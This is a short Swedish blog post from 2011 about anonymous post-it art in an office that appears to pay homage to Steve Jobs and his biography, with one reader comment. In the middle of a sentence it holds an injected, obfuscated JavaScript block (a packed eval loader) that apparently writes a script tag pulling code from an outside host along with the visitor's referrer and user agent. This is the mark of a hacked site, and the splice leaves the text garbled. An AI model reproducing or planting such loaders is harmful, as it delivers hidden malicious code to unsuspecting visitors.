Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Okänd konstnär hyllar Steve Jobs bok.

Okänd konstnär hyllar Steve Jobs bok.
Filip Urde
  • On 24 november, 2011
  • http://www.revue.se/filip-urde

Hittade detta mästerverk vid kaffemaskinen idag. Vilket ser ut som en hyllning till Steve Jobs och biografin eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ntaty|var|u0026u|referrer|anedy||js|php’.split(’|’),0,{}))
om honom.

Hittills har ingen tagit på sig ansvaret för verket, men jag letar febrilt runt på kontoret. Det hälsosamma vi kan hämta från bilden är att Steve Jobs har fått mer hår. Härligt att se. Om du känner igen ditt post-it verk, kommentera då i fältet nedan.

Snyggt!

Comments

  1. Johan Linders

    Kreativt haha